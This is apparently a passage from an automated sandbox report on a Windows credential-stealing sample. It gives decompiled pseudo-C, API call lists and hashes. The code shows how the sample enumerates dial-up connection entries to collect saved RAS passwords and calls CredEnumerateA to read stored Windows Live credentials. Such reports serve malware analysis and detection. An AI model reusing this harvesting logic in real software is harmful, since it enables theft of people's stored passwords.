                                    • GetProcAddress.KERNEL32(00000000,Thread32First), ref: 00404EF0
                                    • GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 00404F02
                                    • GetProcAddress.KERNEL32(00000000,Module32First), ref: 00404F14
                                    • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00404F26
                                    • GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 00404F38
                                    • GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 00404F4A
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.517435499.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000004.00000002.517422434.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517448285.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517455139.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517487223.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517498005.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: AddressProc$HandleModule
                                    • String ID: CreateToolhelp32Snapshot$Heap32First$Heap32ListFirst$Heap32ListNext$Heap32Next$Module32First$Module32FirstW$Module32Next$Module32NextW$Process32First$Process32FirstW$Process32Next$Process32NextW$Thread32First$Thread32Next$Toolhelp32ReadProcessMemory$kernel32.dll
                                    • API String ID: 667068680-597814768
                                    • Opcode ID: ba10ce1c238db4b831d24003e7457fdab4bee255a78ea434dca1328541456aef
                                    • Instruction ID: fe5771f8beb9365a204d6e2904ce85914b9e0a1e64c90e6c75949bdee210121a
                                    • Opcode Fuzzy Hash: ba10ce1c238db4b831d24003e7457fdab4bee255a78ea434dca1328541456aef
                                    • Instruction Fuzzy Hash: D531D7F0A01710ABEB60AFB69986A2A3BA8EB857057140D77B100FF2D5C67D8D508B5D
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0040822C, Relevance: 21.3, APIs: 9, Strings: 3, Instructions: 304COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 76%
                                    			E0040822C(void* __eax, void* __ebx, void* __ecx, signed int __edx, void* __edi, void* __esi, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, signed int _a82) {
				intOrPtr _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				struct _OSVERSIONINFOA _v200;
				char _v476;
				char _v733;
				char _v1248;
				char _v1252;
				signed int _v3020;
				signed int _v3024;
				signed int _v3028;
				signed int _v3032;
				signed int _v3036;
				char _v3284;
				char _v3288;
				char _v3292;
				signed int _v3296;
				signed int _v3300;
				intOrPtr* _t114;
				void* _t131;

				_push(__ebx);
				_push(__edx | _a82);
				asm("popad");
				if(__ecx + 1 < 0) {
					_t131 = __eax;
					_t114 = E0040806C("RasGetEntryProperties", __ebx, __eax);
					return  *_t114(_t131, __edi, _v4, _a16, _a12, _a8);
				} else {
					_push(__ebp);
					__ebp = __esp;
					__esp = __esp + 0xfffff328;
					_push(__ebx);
					_push(__esi);
					_push(__edi);
					__edx = 0;
					_v3296 = 0;
					_v3300 = 0;
					_v3036 = 0;
					_v3032 = 0;
					_v32 = 0;
					_v36 = 0;
					_v40 = 0;
					_v48 = 0;
					_v52 = 0;
					_v56 = 0;
					_v16 = __eax;
					__eax = 0;
					_push(__ebp);
					_push(0x40861b);
					_push( *[fs:eax]);
					 *[fs:eax] = __esp;
					_v16 = E00401AC0(_v16);
					_v28 = E00407FF0();
					__eflags = _v28;
					if(_v28 != 0) {
						__eax = _v20;
						_push(_v20);
						__eax =  &_v24;
						__ecx = 1;
						__edx =  *0x408214; // 0x408218
						__eax = E00402FBC();
						__esp = __esp + 4;
						__edx = _v24;
						__eax = 0x108;
						 *_v24 = 0x108;
						__edx = 0x108 * _v20 >> 0x20;
						__eax = 0x108 * _v20;
						_v12 = 0x108 * _v20;
						__eax =  &_v20;
						_push( &_v20);
						__eax =  &_v12;
						_push( &_v12);
						__eax = _v24;
						_push(__eax);
						_push(0);
						_push(0);
						L00407B84();
						__eflags = __eax;
						if(__eax == 0) {
							_v200.dwOSVersionInfoSize = 0x94;
							 &_v200 = GetVersionExA( &_v200);
							__eax =  &_v28;
							__edx = 0x105;
							__eax = E00402074( &_v28, 0x105);
							__eax =  &_v32;
							__edx = 0x105;
							__eax = E00402074( &_v32, 0x105);
							__eflags = _v200.dwPlatformId - 2;
							if(_v200.dwPlatformId == 2) {
								__eflags = _v200.dwMajorVersion - 5;
								if(_v200.dwMajorVersion >= 5) {
									_push(0);
									_push(0x1a);
									__eax =  &_v28;
									__eax = E00401F9C( &_v28);
									_push(__eax);
									_push(0);
									L00407B7C();
									__eflags = __eax;
									if(__eflags != 0) {
										__edx =  &_v3024;
										_v28 = E00407F4C(_v28,  &_v3024, __eflags);
										__edx = _v3024;
										 &_v28 = E00401B58( &_v28, _v3024);
									}
									_push(0);
									_push(0x23);
									__eax =  &_v32;
									__eax = E00401F9C( &_v32);
									_push(__eax);
									_push(0);
									L00407B7C();
									__eflags = __eax;
									if(__eflags != 0) {
										__edx =  &_v3028;
										_v32 = E00407F4C(_v32,  &_v3028, __eflags);
										__edx = _v3028;
										 &_v32 = E00401B58( &_v32, _v3028);
									}
									__eax = E00407E40(__ebx, __ecx, __edi, __esi, __eflags);
								}
							}
							_v36 = 0xffffffff;
							__eax = _v20;
							__eax = _v20 - 1;
							__eflags = __eax;
							if(__eax >= 0) {
								_v52 = __eax;
								__esi = 0;
								__eflags = 0;
								do {
									_v1252 = 0x41c;
									__esi = __esi << 5;
									__ebx = (__esi << 5) + __esi;
									__eax = _v24;
									__eax = _v24 + 4 + __ebx * 8;
									__edx =  &_v1248;
									__ecx = 0x100;
									E00401258(_v24 + 4 + __ebx * 8, 0x100,  &_v1248) =  &_v36;
									_push( &_v36);
									__eax =  &_v1252;
									_push( &_v1252);
									_push(0);
									L00407B8C();
									_v12 = 0x6e8;
									__eax =  &_v3020;
									__ecx = 0;
									__edx = _v12;
									E00401414( &_v3020, _v12) = _v12;
									_v3020 = _v12;
									 &_v12 =  &_v16;
									__eax = _v24;
									__edx = _v24 + 4 + __ebx * 8;
									__ecx =  &_v3020;
									0 = E004081BC(0, _v24 + 4 + __ebx * 8,  &_v16, 0,  &_v12);
									__eflags = _v200.dwPlatformId - 2;
									if(_v200.dwPlatformId == 2) {
										__eflags = _v200.dwMajorVersion - 5;
										if(_v200.dwMajorVersion >= 5) {
											__eax = _v28;
											__eflags =  *_v28;
											if( *_v28 != 0) {
												L17:
												__eax =  &_v40;
												__edx =  &_v1248;
												__eax = E00401CAC( &_v40,  &_v1248);
												__edx =  &_v44;
												_v40 = E00403268(_v40, __ebx, __ecx,  &_v44, __esi, __eflags);
												 &_v28 = E00401F9C( &_v28);
												__eax = _v40;
												__eax = E00401F48(_v40);
												__edi = __eax;
												__ebx = __eax;
												__eflags = __ebx;
												if(__ebx == 0) {
													__eax =  &_v32;
													__eax = E00401F9C( &_v32);
													__ebx = __eax;
												}
												__eflags = __ebx;
												if(__ebx == 0) {
													 &_v28 = E00401F9C( &_v28);
													__eax = _v44;
													__eax = E00401F48(_v44);
													__ebx = __eax;
												}
												__eflags = __ebx;
												if(__ebx == 0) {
													 &_v32 = E00401F9C( &_v32);
													__eax = _v44;
													__eax = E00401F48(_v44);
													__ebx = __eax;
												}
												__eflags = __ebx;
												if(__ebx > 0) {
													__eax = __ebx;
													__edx = 0;
													__eflags = 0;
													 &_v3284 = E00402BC0( &_v3284, __ebx, 0);
													__edx =  &_v3284;
													 &_v48 = E00401D18( &_v48,  &_v3284, __eflags);
													__edi = 0x100;
													__ebx = 0x40e9bc;
													do {
														__eax =  *__ebx;
														__edx = _v48;
														__eax = E00401E94( *__ebx, _v48);
														if(__eflags == 0) {
															__eflags =  *(__ebx + 4);
															if( *(__ebx + 4) != 0) {
																_t92 = __ebx + 4; // 0x0
																__eax =  *_t92;
																_push(E00401D50( *_t92));
																_t93 = __ebx + 4; // 0x0
																__eax =  *_t93;
																__edx = E00401F48( *_t93);
																__eax =  &_v476;
																_pop(__ecx);
																__eax = E00408038( &_v476, __ecx, __edx);
															}
														}
														__ebx = __ebx + 8;
														__edi = __edi - 1;
														__eflags = __edi;
													} while (__edi != 0);
												}
											} else {
												__eax = _v32;
												__eflags =  *_v32;
												if( *_v32 != 0) {
													goto L17;
												}
											}
										}
									}
									__eax =  &_v733;
									__eflags =  &_v733;
									if( &_v733 != 0) {
										__eax =  &_v476;
										__eflags =  &_v476;
										if( &_v476 != 0) {
											__eax = _v8;
											_push( *_v8);
											_push("RAS Passwords |");
											__eax =  &_v3288;
											__edx =  &_v733;
											__eax = E00401CAC( &_v3288,  &_v733);
											_push(_v3288);
											_push(0x40865c);
											__eax =  &_v3292;
											__edx =  &_v476;
											__eax = E00401CAC( &_v3292,  &_v476);
											_push(_v3292);
											_push(0x40865c);
											_push(0x408668);
											__eax = _v8;
											__edx = 7;
											E00401E10();
										}
									}
									__esi = __esi + 1;
									_t105 =  &_v52;
									 *_t105 = _v52 - 1;
									__eflags =  *_t105;
								} while ( *_t105 != 0);
							}
						}
					}
					__eax = 0;
					__eflags = 0;
					_pop(__edx);
					_pop(__ecx);
					_pop(__ecx);
					 *[fs:eax] = __edx;
					_push(E00408622);
					__eax =  &_v3292;
					__edx = 2;
					__eax = E00401AE4( &_v3292, 2);
					__eax =  &_v3028;
					__edx = 2;
					__eax = E00401AE4( &_v3028, 2);
					__eax =  &_v48;
					__edx = 3;
					__eax = E00401AE4( &_v48, 3);
					__eax =  &_v32;
					__edx = 2;
					__eax = E00401AE4( &_v32, 2);
					__eax =  &_v24;
					__edx =  *0x408214; // 0x408218
					return E00402FC8( &_v24, __edx);
				}
			}


































                                    0x00408230
                                    0x00408231
                                    0x00408232
                                    0x00408234
                                    0x004081c8
                                    0x004081cf
                                    0x004081ef
                                    0x00408238
                                    0x00408238
                                    0x00408239
                                    0x0040823b
                                    0x00408241
                                    0x00408242
                                    0x00408243
                                    0x00408244
                                    0x00408246
                                    0x0040824c
                                    0x00408252
                                    0x00408258
                                    0x0040825e
                                    0x00408261
                                    0x00408264
                                    0x00408267
                                    0x0040826a
                                    0x0040826d
                                    0x00408270
                                    0x00408273
                                    0x00408275
                                    0x00408276
                                    0x0040827b
                                    0x0040827e
                                    0x00408284
                                    0x0040828e
                                    0x00408291
                                    0x00408295
                                    0x0040829b
                                    0x0040829e
                                    0x0040829f
                                    0x004082a2
                                    0x004082a7
                                    0x004082ad
                                    0x004082b2
                                    0x004082b5
                                    0x004082b8
                                    0x004082bd
                                    0x004082bf
                                    0x004082bf
                                    0x004082c2
                                    0x004082c5
                                    0x004082c8
                                    0x004082c9
                                    0x004082cc
                                    0x004082cd
                                    0x004082d0
                                    0x004082d1
                                    0x004082d3
                                    0x004082d5
                                    0x004082da
                                    0x004082dc
                                    0x004082e2
                                    0x004082f3
                                    0x004082f8
                                    0x004082fb
                                    0x00408300
                                    0x00408305
                                    0x00408308
                                    0x0040830d
                                    0x00408312
                                    0x00408319
                                    0x0040831b
                                    0x00408322
                                    0x00408324
                                    0x00408326
                                    0x00408328
                                    0x0040832b
                                    0x00408330
                                    0x00408331
                                    0x00408333
                                    0x00408338
                                    0x0040833a
                                    0x0040833c
                                    0x00408345
                                    0x0040834a
                                    0x00408353
                                    0x00408353
                                    0x00408358
                                    0x0040835a
                                    0x0040835c
                                    0x0040835f
                                    0x00408364
                                    0x00408365
                                    0x00408367
                                    0x0040836c
                                    0x0040836e
                                    0x00408370
                                    0x00408379
                                    0x0040837e
                                    0x00408387
                                    0x00408387
                                    0x0040838c
                                    0x0040838c
                                    0x00408322
                                    0x00408391
                                    0x00408398
                                    0x0040839b
                                    0x0040839c
                                    0x0040839e
                                    0x004083a5
                                    0x004083a8
                                    0x004083a8
                                    0x004083aa
                                    0x004083aa
                                    0x004083b6
                                    0x004083b9
                                    0x004083bb
                                    0x004083be
                                    0x004083c2
                                    0x004083c8
                                    0x004083d2
                                    0x004083d5
                                    0x004083d6
                                    0x004083dc
                                    0x004083dd
                                    0x004083df
                                    0x004083e4
                                    0x004083eb
                                    0x004083f1
                                    0x004083f3
                                    0x004083fb
                                    0x004083fe
                                    0x0040840a
                                    0x0040840e
                                    0x00408411
                                    0x00408415
                                    0x0040841d
                                    0x00408422
                                    0x00408429
                                    0x0040842f
                                    0x00408436
                                    0x0040843c
                                    0x0040843f
                                    0x00408442
                                    0x00408450
                                    0x00408450
                                    0x00408453
                                    0x00408459
                                    0x0040845e
                                    0x00408464
                                    0x0040846c
                                    0x00408479
                                    0x0040847c
                                    0x00408481
                                    0x00408489
                                    0x0040848b
                                    0x0040848d
                                    0x0040848f
                                    0x00408492
                                    0x004084a5
                                    0x004084a5
                                    0x004084a7
                                    0x004084a9
                                    0x004084ae
                                    0x004084bb
                                    0x004084be
                                    0x004084c9
                                    0x004084c9
                                    0x004084cb
                                    0x004084cd
                                    0x004084d2
                                    0x004084df
                                    0x004084e2
                                    0x004084ed
                                    0x004084ed
                                    0x004084ef
                                    0x004084f1
                                    0x004084f3
                                    0x004084f5
                                    0x004084f5
                                    0x004084ff
                                    0x00408504
                                    0x0040850d
                                    0x00408512
                                    0x00408517
                                    0x0040851c
                                    0x0040851c
                                    0x0040851e
                                    0x00408521
                                    0x00408526
                                    0x00408528
                                    0x0040852c
                                    0x0040852e
                                    0x0040852e
                                    0x00408536
                                    0x00408537
                                    0x00408537
                                    0x0040853f
                                    0x00408541
                                    0x00408547
                                    0x00408548
                                    0x00408548
                                    0x0040852c
                                    0x0040854d
                                    0x00408550
                                    0x00408550
                                    0x00408550
                                    0x0040851c
                                    0x00408444
                                    0x00408444
                                    0x00408447
                                    0x0040844a
                                    0x00000000
                                    0x00000000
                                    0x0040844a
                                    0x00408442
                                    0x00408436
                                    0x00408553
                                    0x00408559
                                    0x0040855b
                                    0x0040855d
                                    0x00408563
                                    0x00408565
                                    0x00408567
                                    0x0040856a
                                    0x0040856c
                                    0x00408571
                                    0x00408577
                                    0x0040857d
                                    0x00408582
                                    0x00408588
                                    0x0040858d
                                    0x00408593
                                    0x00408599
                                    0x0040859e
                                    0x004085a4
                                    0x004085a9
                                    0x004085ae
                                    0x004085b1
                                    0x004085b6
                                    0x004085b6
                                    0x00408565
                                    0x004085bb
                                    0x004085bc
                                    0x004085bc
                                    0x004085bc
                                    0x004085bc
                                    0x004083aa
                                    0x0040839e
                                    0x004082dc
                                    0x004085c5
                                    0x004085c5
                                    0x004085c7
                                    0x004085c8
                                    0x004085c9
                                    0x004085ca
                                    0x004085cd
                                    0x004085d2
                                    0x004085d8
                                    0x004085dd
                                    0x004085e2
                                    0x004085e8
                                    0x004085ed
                                    0x004085f2
                                    0x004085f5
                                    0x004085fa
                                    0x004085ff
                                    0x00408602
                                    0x00408607
                                    0x0040860c
                                    0x0040860f
                                    0x0040861a
                                    0x0040861a

                                    APIs
                                      • Part of subcall function 00407FF0: RasEnumEntriesA.RASAPI32(00000000,00000000,?,?,?), ref: 00408017
                                    • RasEnumEntriesA.RASAPI32(00000000,00000000,?,?,?), ref: 004082D5
                                    • GetVersionExA.KERNEL32(00000094), ref: 004082F3
                                    • SHGetSpecialFolderPathA.SHELL32(00000000,00000000,0000001A,00000000,00000094), ref: 00408333
                                    • SHGetSpecialFolderPathA.SHELL32(00000000,00000000,00000023,00000000,00000000,00000000,0000001A,00000000,00000094), ref: 00408367
                                      • Part of subcall function 00407F4C: lstrlen.KERNEL32(00000000,?,?,0040837E,00000000,00000000,00000023,00000000,00000000,00000000,0000001A,00000000,00000094), ref: 00407F68
                                    • RasGetEntryDialParamsA.RASAPI32(00000000,0000041C,FFFFFFFF), ref: 004083DF
                                    • GetPrivateProfileIntA.KERNEL32(00000000,DialParamsUID,00000000,00000000), ref: 00408484
                                    • GetPrivateProfileIntA.KERNEL32(00000000,DialParamsUID,00000000,00000000), ref: 004084A0
                                    • GetPrivateProfileIntA.KERNEL32(00000000,DialParamsUID,00000000,00000000), ref: 004084C4
                                    • GetPrivateProfileIntA.KERNEL32(00000000,DialParamsUID,00000000,00000000), ref: 004084E8
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.517435499.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000004.00000002.517422434.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517448285.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517455139.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517487223.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517498005.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: PrivateProfile$EntriesEnumFolderPathSpecial$DialEntryParamsVersionlstrlen
                                    • String ID: DialParamsUID$RAS Passwords |$RasGetEntryProperties
                                    • API String ID: 606077693-541967613
                                    • Opcode ID: 1ab6e728647767d20885926d8c5f550152f1a8eb9b5063f4c77c40aaee44733b
                                    • Instruction ID: 6468358b1ab4b7f73c56054985f5742c7a8c8687d669c1df658abded6e8fa1dc
                                    • Opcode Fuzzy Hash: 1ab6e728647767d20885926d8c5f550152f1a8eb9b5063f4c77c40aaee44733b
                                    • Instruction Fuzzy Hash: 88C10F70A002199FDB10EBA5CD81BDEB7B9EF44308F1045BBE544B72D1DB78AE458B68
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00408238, Relevance: 19.5, APIs: 9, Strings: 2, Instructions: 277COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 69%
                                    			E00408238(intOrPtr* __eax, void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _v8;
				signed int _v12;
				char _v16;
				signed int _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				struct _OSVERSIONINFOA _v200;
				char _v476;
				char _v733;
				char _v1248;
				char _v1252;
				signed int _v3020;
				char _v3024;
				char _v3028;
				char _v3284;
				char _v3288;
				char _v3292;
				char _t130;
				void* _t138;
				CHAR* _t167;
				void* _t181;
				CHAR* _t185;
				CHAR* _t190;
				void* _t199;
				void* _t201;
				int _t215;
				intOrPtr* _t216;
				signed int* _t222;
				void* _t223;
				intOrPtr _t225;
				intOrPtr _t230;
				CHAR* _t253;
				void* _t254;
				signed int _t256;
				void* _t259;

				_t255 = __esi;
				_t252 = __edi;
				_t211 = __ebx;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_v3288 = 0;
				_v3292 = 0;
				_v3028 = 0;
				_v3024 = 0;
				_v24 = 0;
				_v28 = 0;
				_v32 = 0;
				_v40 = 0;
				_v44 = 0;
				_v48 = 0;
				_v8 = __eax;
				_push(_t259);
				_push(0x40861b);
				_push( *[fs:eax]);
				 *[fs:eax] = _t259 + 0xfffff328;
				E00401AC0(_v8);
				_v20 = E00407FF0();
				if(_v20 != 0) {
					_push(_v20);
					E00402FBC();
					 *_v24 = 0x108;
					_v12 = 0x108 * _v20;
					_push( &_v20);
					_push( &_v12);
					_t130 = _v24;
					_push(_t130);
					_push(0);
					_push(0);
					L00407B84();
					if(_t130 == 0) {
						_v200.dwOSVersionInfoSize = 0x94;
						GetVersionExA( &_v200);
						E00402074( &_v28, 0x105);
						E00402074( &_v32, 0x105);
						if(_v200.dwPlatformId == 2 && _v200.dwMajorVersion >= 5) {
							_push(0);
							_push(0x1a);
							_t199 = E00401F9C( &_v28);
							_push(_t199);
							_push(0);
							L00407B7C();
							_t267 = _t199;
							if(_t199 != 0) {
								E00407F4C(_v28,  &_v3024, _t267);
								E00401B58( &_v28, _v3024);
							}
							_push(0);
							_push(0x23);
							_t201 = E00401F9C( &_v32);
							_push(_t201);
							_push(0);
							L00407B7C();
							_t268 = _t201;
							if(_t201 != 0) {
								E00407F4C(_v32,  &_v3028, _t268);
								E00401B58( &_v32, _v3028);
							}
							E00407E40(_t211, 1, _t252, _t255, _t268);
						}
						_v36 = 0xffffffff;
						_t138 = _v20 - 1;
						if(_t138 >= 0) {
							_v52 = _t138 + 1;
							_t256 = 0;
							do {
								_v1252 = 0x41c;
								_t214 = (_t256 << 5) + _t256;
								E00401258(_v24 + 4 + ((_t256 << 5) + _t256) * 8, 0x100,  &_v1248);
								_push( &_v36);
								_push( &_v1252);
								_push(0);
								L00407B8C();
								_v12 = 0x6e8;
								E00401414( &_v3020, _v12);
								_v3020 = _v12;
								_t222 =  &_v3020;
								E004081BC(0, _v24 + 4 + ((_t256 << 5) + _t256) * 8,  &_v16, 0,  &_v12);
								if(_v200.dwPlatformId == 2 && _v200.dwMajorVersion >= 5) {
									if( *_v28 != 0) {
										L15:
										E00401CAC( &_v40,  &_v1248);
										E00403268(_v40, _t214, _t222,  &_v44, _t256, _t274);
										_t167 = E00401F9C( &_v28);
										_t253 = E00401F48(_v40);
										_t215 = GetPrivateProfileIntA(_t253, "DialParamsUID", 0, _t167);
										if(_t215 == 0) {
											_t215 = GetPrivateProfileIntA(_t253, "DialParamsUID", 0, E00401F9C( &_v32));
										}
										if(_t215 == 0) {
											_t190 = E00401F9C( &_v28);
											_t215 = GetPrivateProfileIntA(E00401F48(_v44), "DialParamsUID", 0, _t190);
										}
										if(_t215 == 0) {
											_t185 = E00401F9C( &_v32);
											_t215 = GetPrivateProfileIntA(E00401F48(_v44), "DialParamsUID", 0, _t185);
										}
										if(_t215 > 0) {
											E00402BC0( &_v3284, _t215, 0);
											E00401D18( &_v48,  &_v3284, 0);
											_t254 = 0x100;
											_t216 = 0x40e9bc;
											do {
												E00401E94( *_t216, _v48);
												if(0 == 0 &&  *((intOrPtr*)(_t216 + 4)) != 0) {
													_t87 = _t216 + 4; // 0x0
													_push(E00401D50( *_t87));
													_t88 = _t216 + 4; // 0x0
													_t181 = E00401F48( *_t88);
													_pop(_t223);
													E00408038( &_v476, _t223, _t181);
												}
												_t216 = _t216 + 8;
												_t254 = _t254 - 1;
											} while (_t254 != 0);
										}
									} else {
										_t274 =  *_v32;
										if( *_v32 != 0) {
											goto L15;
										}
									}
								}
								if( &_v733 != 0 &&  &_v476 != 0) {
									_push( *_v8);
									_push("RAS Passwords |");
									E00401CAC( &_v3288,  &_v733);
									_push(_v3288);
									_push(0x40865c);
									E00401CAC( &_v3292,  &_v476);
									_push(_v3292);
									_push(0x40865c);
									_push(0x408668);
									E00401E10();
								}
								_t256 = _t256 + 1;
								_t100 =  &_v52;
								 *_t100 = _v52 - 1;
							} while ( *_t100 != 0);
						}
					}
				}
				_pop(_t225);
				 *[fs:eax] = _t225;
				_push(E00408622);
				E00401AE4( &_v3292, 2);
				E00401AE4( &_v3028, 2);
				E00401AE4( &_v48, 3);
				E00401AE4( &_v32, 2);
				_t230 =  *0x408214; // 0x408218
				return E00402FC8( &_v24, _t230);
			}












































                                    0x00408238
                                    0x00408238
                                    0x00408238
                                    0x00408241
                                    0x00408242
                                    0x00408243
                                    0x00408246
                                    0x0040824c
                                    0x00408252
                                    0x00408258
                                    0x0040825e
                                    0x00408261
                                    0x00408264
                                    0x00408267
                                    0x0040826a
                                    0x0040826d
                                    0x00408270
                                    0x00408275
                                    0x00408276
                                    0x0040827b
                                    0x0040827e
                                    0x00408284
                                    0x0040828e
                                    0x00408295
                                    0x0040829e
                                    0x004082ad
                                    0x004082bd
                                    0x004082c2
                                    0x004082c8
                                    0x004082cc
                                    0x004082cd
                                    0x004082d0
                                    0x004082d1
                                    0x004082d3
                                    0x004082d5
                                    0x004082dc
                                    0x004082e2
                                    0x004082f3
                                    0x00408300
                                    0x0040830d
                                    0x00408319
                                    0x00408324
                                    0x00408326
                                    0x0040832b
                                    0x00408330
                                    0x00408331
                                    0x00408333
                                    0x00408338
                                    0x0040833a
                                    0x00408345
                                    0x00408353
                                    0x00408353
                                    0x00408358
                                    0x0040835a
                                    0x0040835f
                                    0x00408364
                                    0x00408365
                                    0x00408367
                                    0x0040836c
                                    0x0040836e
                                    0x00408379
                                    0x00408387
                                    0x00408387
                                    0x0040838c
                                    0x0040838c
                                    0x00408391
                                    0x0040839b
                                    0x0040839e
                                    0x004083a5
                                    0x004083a8
                                    0x004083aa
                                    0x004083aa
                                    0x004083b9
                                    0x004083cd
                                    0x004083d5
                                    0x004083dc
                                    0x004083dd
                                    0x004083df
                                    0x004083e4
                                    0x004083f6
                                    0x004083fe
                                    0x00408415
                                    0x0040841d
                                    0x00408429
                                    0x00408442
                                    0x00408450
                                    0x00408459
                                    0x00408464
                                    0x0040846c
                                    0x00408481
                                    0x00408489
                                    0x0040848d
                                    0x004084a5
                                    0x004084a5
                                    0x004084a9
                                    0x004084ae
                                    0x004084c9
                                    0x004084c9
                                    0x004084cd
                                    0x004084d2
                                    0x004084ed
                                    0x004084ed
                                    0x004084f1
                                    0x004084ff
                                    0x0040850d
                                    0x00408512
                                    0x00408517
                                    0x0040851c
                                    0x00408521
                                    0x00408526
                                    0x0040852e
                                    0x00408536
                                    0x00408537
                                    0x0040853a
                                    0x00408547
                                    0x00408548
                                    0x00408548
                                    0x0040854d
                                    0x00408550
                                    0x00408550
                                    0x0040851c
                                    0x00408444
                                    0x00408447
                                    0x0040844a
                                    0x00000000
                                    0x00000000
                                    0x0040844a
                                    0x00408442
                                    0x0040855b
                                    0x0040856a
                                    0x0040856c
                                    0x0040857d
                                    0x00408582
                                    0x00408588
                                    0x00408599
                                    0x0040859e
                                    0x004085a4
                                    0x004085a9
                                    0x004085b6
                                    0x004085b6
                                    0x004085bb
                                    0x004085bc
                                    0x004085bc
                                    0x004085bc
                                    0x004083aa
                                    0x0040839e
                                    0x004082dc
                                    0x004085c7
                                    0x004085ca
                                    0x004085cd
                                    0x004085dd
                                    0x004085ed
                                    0x004085fa
                                    0x00408607
                                    0x0040860f
                                    0x0040861a

                                    APIs
                                      • Part of subcall function 00407FF0: RasEnumEntriesA.RASAPI32(00000000,00000000,?,?,?), ref: 00408017
                                    • RasEnumEntriesA.RASAPI32(00000000,00000000,?,?,?), ref: 004082D5
                                    • GetVersionExA.KERNEL32(00000094), ref: 004082F3
                                    • SHGetSpecialFolderPathA.SHELL32(00000000,00000000,0000001A,00000000,00000094), ref: 00408333
                                    • SHGetSpecialFolderPathA.SHELL32(00000000,00000000,00000023,00000000,00000000,00000000,0000001A,00000000,00000094), ref: 00408367
                                      • Part of subcall function 00407F4C: lstrlen.KERNEL32(00000000,?,?,0040837E,00000000,00000000,00000023,00000000,00000000,00000000,0000001A,00000000,00000094), ref: 00407F68
                                    • RasGetEntryDialParamsA.RASAPI32(00000000,0000041C,FFFFFFFF), ref: 004083DF
                                    • GetPrivateProfileIntA.KERNEL32(00000000,DialParamsUID,00000000,00000000), ref: 00408484
                                    • GetPrivateProfileIntA.KERNEL32(00000000,DialParamsUID,00000000,00000000), ref: 004084A0
                                    • GetPrivateProfileIntA.KERNEL32(00000000,DialParamsUID,00000000,00000000), ref: 004084C4
                                    • GetPrivateProfileIntA.KERNEL32(00000000,DialParamsUID,00000000,00000000), ref: 004084E8
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.517435499.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000004.00000002.517422434.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517448285.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517455139.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517487223.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517498005.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: PrivateProfile$EntriesEnumFolderPathSpecial$DialEntryParamsVersionlstrlen
                                    • String ID: DialParamsUID$RAS Passwords |
                                    • API String ID: 606077693-3751168726
                                    • Opcode ID: fbe06dde2b49a42d26d1befe1d029615117769fb4e2dbfe38565cae11eece56a
                                    • Instruction ID: 7375f334a108091beab50651aa9ecc72c5d4f12faf085ce0e41049e672a00ba2
                                    • Opcode Fuzzy Hash: fbe06dde2b49a42d26d1befe1d029615117769fb4e2dbfe38565cae11eece56a
                                    • Instruction Fuzzy Hash: 45B12070E002199BDB10EFA5CD82BDEB7B9AF44308F1045BBE544B72D1DB78AE458B58
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00409D28, Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 109libraryloaderCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 60%
                                    			E00409D28(intOrPtr* __eax, void* __ebx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				struct HINSTANCE__* _v16;
				char _v20;
				char _v24;
				intOrPtr _v28;
				char _v32;
				char _v36;
				void* _t47;
				intOrPtr* _t70;
				void* _t74;
				intOrPtr _t76;
				intOrPtr _t78;
				signed int _t90;
				void* _t91;
				intOrPtr _t93;

				_t89 = __esi;
				_t70 = __eax;
				 *[fs:eax] = _t93;
				E00401AC0(__eax);
				_v16 = LoadLibraryA("advapi32.dll");
				 *0x40f1dc = GetProcAddress(_v16, "CredEnumerateA");
				 *0x40f1e0 = GetProcAddress(_v16, "CredFree");
				 *0x40f1dc("WindowsLive:name=*", 0,  &_v12,  &_v8,  *[fs:eax], 0x409e71, _t93, __edi, __esi, __ebx, 0, 0, 0, 0, 0, 0, 0, 0, _t91);
				if(_v12 != 0) {
					_t47 = _v12 - 1;
					if(_t47 >= 0) {
						_v20 = _t47 + 1;
